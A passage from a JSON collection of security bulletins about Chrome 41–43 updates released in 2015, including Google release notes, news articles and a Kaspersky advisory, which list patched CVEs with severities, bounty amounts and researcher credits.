fixes](<https://code.google.com/p/chromium/issues/list?can=1&q=type%3Abug-security+label%3ARelease-0-M43&sort=id+-security_severity+-secseverity+-owner+-modified&colspec=ID+Pri+Status+Summary+Modified+OS+M+Security_severity+Security_impact+Owner+Reporter&cells=tiles>). Below, we highlight fixes that were contributed by external researchers. Please see the [Chromium security page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information. \n\n\n[$16337][[474029](<https://code.google.com/p/chromium/issues/detail?id=474029>)]** High** CVE-2015-1252: Sandbox escape in Chrome. Credit to anonymous. \n[$7500][[464552](<https://code.google.com/p/chromium/issues/detail?id=464552>)] **High** CVE-2015-1253: Cross-origin bypass in DOM. Credit to anonymous. \n[$3000][[444927](<https://code.google.com/p/chromium/issues/detail?id=444927>)] **High** CVE-2015-1254: Cross-origin bypass in Editing. Credit to Armin Razmdjou. \n[$3000][[473253](<https://code.google.com/p/chromium/issues/detail?id=473253>)] **High** CVE-2015-1255: Use-after-free in WebAudio. Credit to Khalil Zhani. \n[$2000][[478549](<https://code.google.com/p/chromium/issues/detail?id=478549>)] **High** CVE-2015-1256: Use-after-free in SVG. Credit to Atte Kettunen of OUSPG. \n[[481015](<https://code.google.com/p/chromium/issues/detail?id=481015>)] **High** CVE-2015-1251: Use-after-free in Speech. Credit to SkyLined working with HP's Zero Day Initiative \n[$1500][[468519](<https://code.google.com/p/chromium/issues/detail?id=468519>)] **Medium** CVE-2015-1257: Container-overflow in SVG. Credit to miaubiz. \n[$1000][[450939](<https://code.google.com/p/chromium/issues/detail?id=450939>)] **Medium** CVE-2015-1258: Negative-size parameter in Libvpx. Credit to cloudfuzzer \n[$1000][[468167](<https://code.google.com/p/chromium/issues/detail?id=468167>)] **Medium** CVE-2015-1259: Uninitialized value in PDFium. Credit to Atte Kettunen of OUSPG \n[$1000][[474370](<https://code.google.com/p/chromium/issues/detail?id=474370>)] **Medium** CVE-2015-1260: Use-after-free in WebRTC. Credit to Khalil Zhani. \n[$500][[466351](<https://code.google.com/p/chromium/issues/detail?id=466351>)] **Medium** CVE-2015-1261: URL bar spoofing. Credit to Juho Nurminen. \n[$500][[476647](<https://code.google.com/p/chromium/issues/detail?id=476647>)] **Medium** CVE-2015-1262: Uninitialized value in Blink. Credit to miaubiz. \n[$500][[479162](<https://code.google.com/p/chromium/issues/detail?id=479162>)] **Low** CVE-2015-1263: Insecure download of spellcheck dictionary. Credit to Mike Ruddy. \n[$500][[481015](<https://code.google.com/p/chromium/issues/detail?id=481015>)] **Low** CVE-2015-1264: Cross-site scripting in bookmarks. Credit to K0r3Ph1L. \n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. The total value of additional rewards and their recipients will updated here when all reports have gone through the reward panel. \n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes: \n\n\n * [[489518](<https://code.google.com/p/chromium/issues/detail?id=489518>)] CVE-2015-1265: Various fixes from internal audits, fuzzing and other initiatives.\n * Multiple vulnerabilities in V8 fixed at the tip of the 4.3 branch (currently 4.3.61.21).\n\nMany of the above bugs were detected using [AddressSanitizer](<http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>) or [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>). \n\nInterested in switching release channels? [Find out how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<http://crbug.com/>). \n\n\n\n\n\nAre you a project manager, with a technical background, who is passionate about Chrome and moving the web forward? We are [hiring](<https://www.google.com/about/careers/search#!t=jo&jid=72645002&>)! \n\n\n\nAnthony Laforge \nGoogle Chrome", "cvss3": {}, "published": "2015-05-19T00:00:00", "type": "chrome", "title": "Stable Channel Update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-05-19T00:00:00", "id": "GCSA-990503644729999677", "href": "https://chromereleases.googleblog.com/2015/05/stable-channel-update_19.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T22:34:28", "description": "The Chrome team is overjoyed to announce the promotion of Chrome 42 to the stable channel for Windows, Mac and Linux. Chrome 42.0.2311.90 contains a number of fixes and improvements, including: \n\n\n\n * A number of new apps, extension and Web Platform APIs (including the [Push API](<https://dvcs.w3.org/hg/push/raw-file/tip/index.html>)!)\n * Lots of under the hood changes for stability and performance\n * The answer to [life, the universe and everything](<https://www.google.com/search?&q=answer+to+life%2C+the+universe+and+everything&gws_rd=ssl>)\n\nA list of changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/41.0.2272.0..42.0.2311.0?pretty=fuller&n=10000>). \n\n**Security Fixes and Rewards** \n\n_Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed._ \n\nThis update includes [45 security fixes](<https://code.google.com/p/chromium/issues/list?can=1&q=type%3Abug-security+label%3ARelease-0-M42&sort=id+-security_severity+-secseverity+-owner+-modified&colspec=ID+Pri+Status+Summary+Modified+OS+M+Security_severity+Security_impact+Owner+Reporter&cells=tiles>). Below, we highlight fixes that were contributed by external researchers. Please see the [Chromium security page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information. \n\n[$7500][[456518](<https://code.google.com/p/chromium/issues/detail?id=456518>)] High CVE-2015-1235: Cross-origin-bypass in HTML parser. Credit to anonymous. \n[$4000][[313939](<https://code.google.com/p/chromium/issues/detail?id=313939>)] Medium CVE-2015-1236: Cross-origin-bypass in Blink. Credit to Amitay Dobo. \n[$3000][[461191](<https://code.google.com/p/chromium/issues/detail?id=461191>)] High CVE-2015-1237: Use-after-free in IPC. Credit to Khalil Zhani. \n[$2000][[445808](<https://code.google.com/p/chromium/issues/detail?id=445808>)] High CVE-2015-1238: Out-of-bounds write in Skia. Credit to cloudfuzzer. \n[$1000][[463599](<https://code.google.com/p/chromium/issues/detail?id=463599>)] Medium CVE-2015-1240: Out-of-bounds read in WebGL. Credit to w3bd3vil. \n[$1000][[418402](<https://code.google.com/p/chromium/issues/detail?id=418402>)] Medium CVE-2015-1241: Tap-Jacking. Credit to Phillip Moon and Matt Weston of Sandfield. \n[$500][[460917](<https://code.google.com/p/chromium/issues/detail?id=460917>)] High CVE-2015-1242: Type confusion in V8. Credit to fcole@onshape.com. \n[$500][[455215](<https://code.google.com/p/chromium/issues/detail?id=455215>)] Medium CVE-2015-1244: HSTS bypass in WebSockets. Credit to Mike Ruddy. \n[$500][[444957](<https://code.google.com/p/chromium/issues/detail?id=444957>)] Medium CVE-2015-1245: Use-after-free in PDFium. Credit to Khalil Zhani. \n[$500][[437399](<https://code.google.com/p/chromium/issues/detail?id=437399>)] Medium CVE-2015-1246: Out-of-bounds read in Blink. Credit to Atte Kettunen of OUSPG. \n[$500][[429838](<https://code.google.com/p/chromium/issues/detail?id=429838>)] Medium CVE-2015-1247: Scheme issues in OpenSearch. Credit to Jann Horn. \n[$500][[380663](<https://code.google.com/p/chromium/issues/detail?id=380663>)] Medium CVE-2015-1248: SafeBrowsing bypass. Credit to Vittorio Gambaletta (VittGam). \n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. The total value of additional rewards and their recipients will updated here when all reports have gone through the reward panel. \n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes: \n[[476786](<https://code.google.com/p/chromium/issues/detail?id=476786>)] CVE-2015-1249: Various fixes from internal audits, fuzzing and other initiatives. \nMultiple vulnerabilities in V8 fixed at the tip of the 4.2 branch (currently 4.2.77.14). \n\nMany of the above bugs were detected using [AddressSanitizer](<http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>) or [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>). \n\nInterested in switching release channels? [Find out how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<http://crbug.com/>). \n\nAlex Mineer \nGoogle Chrome", "cvss3": {}, "published": "2015-04-14T00:00:00", "type": "chrome", "title": "Stable Channel Update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249"], "modified": "2015-04-14T00:00:00", "id": "GCSA-2222529096158216213", "href": "https://chromereleases.googleblog.com/2015/04/stable-channel-update_14.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T22:33:54", "description": "The stable channel has been updated to 42.0.2311.135 for Windows, Mac and Linux. A list of changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/42.0.2311.90..42.0.2311.135?pretty=fuller&n=10000>). \n\n**Security Fixes and Rewards** \n_Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed._ \n\nThis update includes [5 security fixes](<https://code.google.com/p/chromium/issues/list?can=1&q=type%3Abug-security+label%3ARelease-1-M42&sort=id+-security_severity+-secseverity+-owner+-modified&colspec=ID+Pri+Status+Summary+Modified+OS+M+Security_severity+Security_impact+Owner+Reporter&cells=tiles>). Below, we highlight fixes that were contributed by external researchers. Please see the Chromium security page for more information. \n\n[$TBD][[453279](<https://code.google.com/p/chromium/issues/detail?id=453279>)] High CVE-2015-1243: Use-after-free in DOM. Credit to Saif El-Sherei. \n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes: \n[[481777](<https://code.google.com/p/chromium/issues/detail?id=481777>)] CVE-2015-1250: Various fixes from internal audits, fuzzing and other initiatives. \n\nInterested in switching release channels? [Find out how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<http://crbug.com/>). \n\nAlex Mineer \nGoogle Chrome", "cvss3": {}, "published": "2015-04-28T00:00:00", "type": "chrome", "title": "Stable Channel Update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2015-04-28T00:00:00", "id": "GCSA-519917648682114627", "href": "https://chromereleases.googleblog.com/2015/04/stable-channel-update_28.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T22:34:28", "description": "The stable channel has been updated to 41.0.2272.118 for Windows, Mac and Linux. A partial list of changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/41.0.2272.101..41.0.2272.118?pretty=fuller&n=10000>). \n\n\n\nSecurity Fixes and Rewards\n\n** \n**\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [4 security fixes](<https://code.google.com/p/chromium/issues/list?can=1&q=type%3Abug-security+label%3ARelease-2-M41&sort=id+-security_severity+-secseverity+-owner+-modified&colspec=ID+Pri+Status+Summary+Modified+OS+M+Security_severity+Security_impact+Owner+Reporter&x=m&y=releaseblock&cells=tiles>). Below, we highlight fixes that were contributed by external researchers. Please see the [Chromium security page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$29633.7][[469058](<https://code.google.com/p/chromium/issues/detail?id=469058>)] Critical CVE-2015-1233: A special thanks to Anonymous for a combination of V8, Gamepad and IPC bugs that can lead to remote code execution outside of the sandbox. \n\n[[468936](<https://code.google.com/p/chromium/issues/detail?id=468936>)] High CVE-2015-1234: Buffer overflow via race condition in GPU. Credit to lokihardt working with Pwn2Own and HP's Zero Day Initiative.\n\n\n\nInterested in [switching](<http://www.chromium.org/getting-involved/dev-channel>) release channels? Find out [how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<http://crbug.com/>). \n\n\nPenny MacNeil \nGoogle Chrome", "cvss3": {}, "published": "2015-04-01T00:00:00", "type": "chrome", "title": "Stable Channel Update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2015-04-01T00:00:00", "id": "GCSA-3364801535958232235", "href": "https://chromereleases.googleblog.com/2015/04/stable-channel-update.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:57:03", "description": "Google has released [Chrome 42](<http://googlechromereleases.blogspot.com/2015/04/stable-channel-update_14.html>), a major security upgrade to the browser that includes patches for 45 vulnerabilities.\n\nThe latest version of Chrome carries with it fixes for a number of high-severity bugs, including a cross-origin bypass in the HTML parser. That vulnerability earned an anonymous security researcher a reward of $7,500 from Google. In all, the company paid out more than $21,000 in rewards to external researchers who reported bugs fixed in this version.\n\nAmong the other serious flaws patched in Chrome 42 is a use-after-free in the IPC component of the browser and a type confusion bug in the V8 engine. There also is a cross-origin bypass in the Blink layout engine, for which Google paid a $4,000 reward to researcher Amitay Dobo.\n\nThe list of security vulnerabilities fixed in Chrome 42 for which Google paid rewards:\n\n[$7500][[456518](<https://code.google.com/p/chromium/issues/detail?id=456518>)] High CVE-2015-1235: Cross-origin-bypass in HTML parser. Credit to anonymous.\n\n[$4000][[313939](<https://code.google.com/p/chromium/issues/detail?id=313939>)] Medium CVE-2015-1236: Cross-origin-bypass in Blink. Credit to Amitay Dobo.\n\n[$3000][[461191](<https://code.google.com/p/chromium/issues/detail?id=461191>)] High CVE-2015-1237: Use-after-free in IPC. Credit to Khalil Zhani.\n\n[$2000][[445808](<https://code.google.com/p/chromium/issues/detail?id=445808>)] High CVE-2015-1238: Out-of-bounds write in Skia. Credit to cloudfuzzer.\n\n[$1000][[463599](<https://code.google.com/p/chromium/issues/detail?id=463599>)] Medium CVE-2015-1240: Out-of-bounds read in WebGL. Credit to w3bd3vil.\n\n[$1000][[418402](<https://code.google.com/p/chromium/issues/detail?id=418402>)] Medium CVE-2015-1241: Tap-Jacking. Credit to Phillip Moon and Matt Weston of Sandfield Information Systems.\n\n[$500][[460917](<https://code.google.com/p/chromium/issues/detail?id=460917>)] High CVE-2015-1242: Type confusion in V8. Credit to fcole@onshape.com.\n\n[$500][[455215](<https://code.google.com/p/chromium/issues/detail?id=455215>)] Medium CVE-2015-1244: HSTS bypass in WebSockets. Credit to Mike Ruddy.\n\n[$500][[444957](<https://code.google.com/p/chromium/issues/detail?id=444957>)] Medium CVE-2015-1245: Use-after-free in PDFium. Credit to Khalil Zhani.\n\n[$500][[437399](<https://code.google.com/p/chromium/issues/detail?id=437399>)] Medium CVE-2015-1246: Out-of-bounds read in Blink. Credit to Atte Kettunen of OUSPG.\n\n[$500][[429838](<https://code.google.com/p/chromium/issues/detail?id=429838>)] Medium CVE-2015-1247: Scheme issues in OpenSearch. Credit to Jann Horn.\n\n[$500][[380663](<https://code.google.com/p/chromium/issues/detail?id=380663>)] Medium CVE-2015-1248: SafeBrowsing bypass. Credit to Vittorio Gambaletta (VittGam).\n\nIn addition to the bugs reported by external researchers, Google also fixed a number of [flaws](<https://code.google.com/p/chromium/issues/detail?id=476786>) discovered through its own internal audits and research.\n", "cvss3": {}, "published": "2015-04-14T14:44:57", "type": "threatpost", "title": "Google Fixes Dozens of Bugs in Chrome 42", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248"], "modified": "2015-04-14T18:44:57", "id": "THREATPOST:9A58ECA2DAAEE4EA3304CFA18B16F775", "href": "https://threatpost.com/google-fixes-dozens-of-bugs-in-chrome-42/112248/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:56:51", "description": "Google has patched a high-risk vulnerability in its Chrome browser that allows an attacker to escape the Chrome sandbox.\n\nThat vulnerability is one of 37 bugs fixed in version 43 of Chrome. Six of those flaws are rated as high risks and Google paid out more than $38,000 in rewards to researchers who reported vulnerabilities to the company. Among the other serious vulnerabilities are cross-origin bypasses and three use-after-free vulnerabilities.\n\nGoogle has not yet released the details of the vulnerabilities, so the nature and location of the sandbox-escape bug aren\u2019t clear. The company waits until most users have updated to the new version before releasing complete details of the vulnerabilities.\n\nHere are the public bugs fixed in Chrome 43:\n\n[$16337][[474029](<https://code.google.com/p/chromium/issues/detail?id=474029>)] High CVE-2015-1252: Sandbox escape in Chrome. Credit to anonymous.\n\n[$7500][[464552](<https://code.google.com/p/chromium/issues/detail?id=464552>)] High CVE-2015-1253: Cross-origin bypass in DOM. Credit to anonymous.\n\n[$3000][[444927](<https://code.google.com/p/chromium/issues/detail?id=444927>)] High CVE-2015-1254: Cross-origin bypass in Editing. Credit to armin@rawsec.net.\n\n[$3000][[473253](<https://code.google.com/p/chromium/issues/detail?id=473253>)] High CVE-2015-1255: Use-after-free in WebAudio. Credit to Khalil Zhani.\n\n[$2000][[478549](<https://code.google.com/p/chromium/issues/detail?id=478549>)] High CVE-2015-1256: Use-after-free in SVG. Credit to Atte Kettunen of OUSPG.\n\n[[481015](<https://code.google.com/p/chromium/issues/detail?id=481015>)] High CVE-2015-1251: Use-after-free in Speech. Credit to SkyLined working with HP\u2019s Zero Day Initiative \n\n[$1500][[468519](<https://code.google.com/p/chromium/issues/detail?id=468519>)] Medium CVE-2015-1257: Container-overflow in SVG. Credit to miaubiz.\n\n[$1000][[450939](<https://code.google.com/p/chromium/issues/detail?id=450939>)] Medium CVE-2015-1258: Negative-size parameter in Libvpx. Credit to cloudfuzzer\n\n[$1000][[468167](<https://code.google.com/p/chromium/issues/detail?id=468167>)] Medium CVE-2015-1259: Uninitialized value in PDFium. Credit to Atte Kettunen of OUSPG\n\n[$1000][[474370](<https://code.google.com/p/chromium/issues/detail?id=474370>)] Medium CVE-2015-1260: Use-after-free in WebRTC. Credit to Khalil Zhani.\n\n[$500][[466351](<https://code.google.com/p/chromium/issues/detail?id=466351>)] Medium CVE-2015-1261: URL bar spoofing. Credit to Juho Nurminen.\n\n[$500][[476647](<https://code.google.com/p/chromium/issues/detail?id=476647>)] Medium CVE-2015-1262: Uninitialized value in Blink. Credit to miaubiz.\n\n[$500][[479162](<https://code.google.com/p/chromium/issues/detail?id=479162>)] Low CVE-2015-1263: Insecure download of spellcheck dictionary. Credit to Mike Ruddy.\n\n[$500][[481015](<https://code.google.com/p/chromium/issues/detail?id=481015>)] Low CVE-2015-1264: Cross-site scripting in bookmarks. Credit to K0r3Ph1L.\n", "cvss3": {}, "published": "2015-05-19T13:19:05", "type": "threatpost", "title": "Google Fixes Sandbox Escape in Chrome", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264"], "modified": "2015-05-19T17:19:05", "id": "THREATPOST:45D2D399F79C59D30CB09CDC7A87747D", "href": "https://threatpost.com/google-fixes-sandbox-escape-in-chrome/112899/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2018-01-27T10:06:50", "description": "[](<https://2.bp.blogspot.com/-OY8G_7PKi_E/VS5YWKpQmMI/AAAAAAAAikc/Y3N9Ag_b0B4/s1600/update-google-chrome.png>)\n\nGoogle has finally rolled out the latest version of its popular web browser, i.e. **_Chrome 42 for Windows, Mac, and Linux _**users that now lets websites send you alerts, no matter your browser is open or not.\n\n \n\n\nThe release of the latest Chrome 42 version is a great deal as it costs Google more than $21,000.\n\n \n\n\n**Yes, $21,000!**\n\n \n\n\nThe latest version of [Chrome](<https://thehackernews.com/search/label/Google%20Chrome>) comes with fixes for 45 security vulnerabilities in the web browser, reported by different security researchers [listed below].\n\n \n\n\n**Let's know about the Major updates**:\n\n \n\n\nMajor [updates](<https://googlechromereleases.blogspot.in/2015/04/stable-channel-update_14.html>) and significant improvements for Chrome version 42 includes:\n\n * Advanced [Push API](<https://w3c.github.io/push-api/>) and [Notifications API](<https://notifications.spec.whatwg.org/>)\n * **_Disabled Oracle's Java plugin by default_** as well as other extensions that use NPAPI\n * Patched 45 security bugs and paid out more than $21,000\n\n**Push API**:\n\n \n\n\nGoogle includes Push API in its web browser for the first time. Push API, when combined with the new notifications API, allows websites to push notifications to you through your browser, even when the browser window is closed.\n\n \n\n\nThe Push API feature is an optional feature, which means that you can enable or disable it as per your need. This will offer users an app-like experience on the web.\n\n \n\n\n**What else?**\n\n \n\n\nChrome 42 brings the **_end of official support for [NPAPI](<https://developer.chrome.com/extensions/npapi>)_** (\"Netscape Plugin API\") by disabling old browser plugins by default that use NPAPI, including Oracle\u2019s Java plugin and Silverlight.\n\n \n\n\nHowever, if you really want this blocked plugin, you can manually enable NPAPI support in Chrome's settings. But, you\u2019ll not enjoy NPAPI support for a long time as by September this year, Google will permanently remove this option.\n\n \n\n\n**Why Google want to vanish NPAPI?**\n\n \n\n\nThe open-source project team has been trying to kill off NPAPI [since 2013](<https://blog.chromium.org/2013/09/saying-goodbye-to-our-old-friend-npapi.html>), describing NPAPI as a dangerous security and stability risk.\n\n \n\n\nThe search engine giant believes that by disallowing to run Java plugin would certainly reduce the possibility of the attack against its Chrome browser.\n\n \n\n\n**Google patches total 45 security holes in its Chrome Browser:**\n\n \n\n\nThere were a number of high-severity vulnerabilities, including one known as **_Cross-origin bypass in the HTML parser_**. An anonymous security researcher was paid a **_reward of $7,500_** from Google for this critical vulnerability.\n\n \n\n\nThe list of rest security bugs fixed in Chrome 42 for which Google paid rewards are:\n\n * CVE-2015-1236 (Medium): Cross-origin-bypass in Blink -- Reward $4000 to Amitay Dobo\n * CVE-2015-1237 (High): Use-after-free in IPC -- Reward $3000 to Khalil Zhani\n * CVE-2015-1238 (High): Out-of-bounds write in Skia -- Reward $2000 to cloudfuzzer\n * CVE-2015-1240 (Medium): Out-of-bounds read in WebGL -- Reward $1000 to w3bd3vil\n * CVE-2015-1241 (Medium): Tap-Jacking -- Reward $1000 to Phillip Moon and Matt Weston of Sandfield Information Systems\n * CVE-2015-1242 (High): Type confusion in V8 -- Reward $500 to fcole@onshape.com\n * CVE-2015-1244 (Medium): HSTS bypass in WebSockets -- Reward $500 to Mike Ruddy\n * CVE-2015-1245 (Medium): Use-after-free in PDFium -- Reward $500 to Khalil Zhani\n * CVE-2015-1246 (Medium): Out-of-bounds read in Blink -- Reward $500 to Atte Kettunen of OUSPG\n * CVE-2015-1247 (Medium): Scheme issues in OpenSearch -- Reward $500 to Jann Horn\n * CVE-2015-1248 (Medium): SafeBrowsing bypass -- Reward $500 to Vittorio Gambaletta (VittGam)\n\nSo, if I talk about the total cost Google spent in bug bounties to external security researchers who contributed reported bugs fixed in this latest version, its around $21,500 in total.\n\n \n\n\n**Let's Update Chrome 42:**\n\n \n\n\nYou can now update this latest version, Chrome Version 42, using the browser\u2019s built-in silent update or download it straight forward from [google.com/chrome](<https://www.google.com/chrome/>). Linux users need to install the Distro Package Manager.\n\n \n\n\nHave you updated Chrome 42 already? Let us know your experience with Chrome 42 in the comment box below!\n", "cvss3": {}, "published": "2015-04-15T01:31:00", "type": "thn", "title": "Google Launches Chrome 42 with Push Notifications", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-1247", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1248", "CVE-2015-1236", "CVE-2015-1242", "CVE-2015-1245", "CVE-2015-1237", "CVE-2015-1238"], "modified": "2015-04-15T12:31:50", "id": "THN:5567C5205B537235576972984F283879", "href": "https://thehackernews.com/2015/04/download-google-chrome.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2021-08-18T11:24:55", "description": "### *Detect date*:\n05/19/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to bypass security restrictions, spoof user interface, conduct cross-scripting attack, cause denial of service or execute arbitrary code.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 43.0.2357.65\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Google Chrome](<https://www.google.com/chrome/browser/desktop/index.html>)\n\n### *Original advisories*:\n[Google blog](<http://feedproxy.google.com/~r/GoogleChromeReleases/~3/r7j0t-RwdaU/stable-channel-update_19.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2015-1258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1258>)7.5Critical \n[CVE-2015-1259](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1259>)7.5Critical \n[CVE-2015-1265](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1265>)7.5Critical \n[CVE-2015-1251](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1251>)6.8High \n[CVE-2015-1262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1262>)7.5Critical \n[CVE-2015-1264](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1264>)4.3Warning \n[CVE-2015-1252](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1252>)7.5Critical \n[CVE-2015-3910](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3910>)7.5Critical \n[CVE-2015-1263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1263>)4.3Warning \n[CVE-2015-1260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1260>)7.5Critical \n[CVE-2015-1261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1261>)5.0Critical \n[CVE-2015-1255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1255>)6.8High \n[CVE-2015-1257](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1257>)7.5Critical \n[CVE-2015-1256](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1256>)7.5Critical \n[CVE-2015-1254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1254>)5.0Critical \n[CVE-2015-1253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1253>)7.5Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {}, "published": "2015-05-19T00:00:00", "type": "kaspersky", "title": "KLA10585 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 